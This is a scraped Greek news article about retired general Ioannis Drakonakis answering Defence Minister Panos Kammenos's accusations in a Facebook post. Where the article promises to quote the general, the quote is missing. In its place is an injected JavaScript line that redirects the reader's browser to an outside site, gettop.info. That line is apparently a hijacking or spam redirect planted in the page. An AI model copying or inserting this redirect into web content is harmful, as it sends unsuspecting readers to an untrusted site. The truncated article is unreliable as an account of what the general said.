Νέο «χτύπημα» από στρατηγό σε Καμμένο: Υπουργέ, μάλλον οι παρατρεχάμενοι σας ανοίγουν τον λάκκο

0
11

Με νέα ανάρτηση στη σελίδα του στο facebook ο απόστρατος στρατηγός Ιωάννης Δρακωνάκης δίνει και πάλι απάντηση στον Πάνο Καμμένο. Υπενθυμίζεται ότι πριν από μερικές ημέρες ο αντιστράτηγος ε.α απηύθυνε ανοικτή επιστολή στον υπουργό Εθνικής Άμυνας εγκαλώντας τον γιατί σε δημόσιες εμφανίσεις του φορά στολές των Ενόπλων Δυνάμεων ακόμη και ΟΥΚ.

Όπως τόνισε στη νέα ανάρτησή του ο κ. Δρακωνάκης μετά την ανοικτή επιστολή του άρχισε η εκστρατεία αποδόμησης και ο πόλεμος της λασπολογίας, της μισής αλήθειας, της παντελούς ανακρίβειας και του ψεύδους.

Μάλιστα, ο κ. Καμμένος δεν δίστασε στη ΔεΕΘ να αναφερθεί στον στρατηγό και να αφήσει αιχμές ότι είχε στενές σχέσεις με τον φυλακισμένο πρώην υπουργό Εθνικής Άμυνας, Άκη Τσοχατζόπουλο, ενώ υποστήριξε ότι επίσης χειριζόταν εξοπλιστικά προγράμματα του ΓΕΣ την επίμαχη περίοδο (1997-2000).

Ακόμη, είπε πως ο κ. Δρακωνάκης δεν παραπέμφθηκε σε στρατοδικείο με πολιτική παρέμβαση του κ. Τσοχατζόπουλου μετά από θανάσιμο τραυματισμό στρατιωτικού το 1994, ενώ χρησιμοποίησε και τον όρο «χουντοπασόκος».

Όπως γράφει χαρακτηριστικά ο κ. Δρακωνάκης:

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here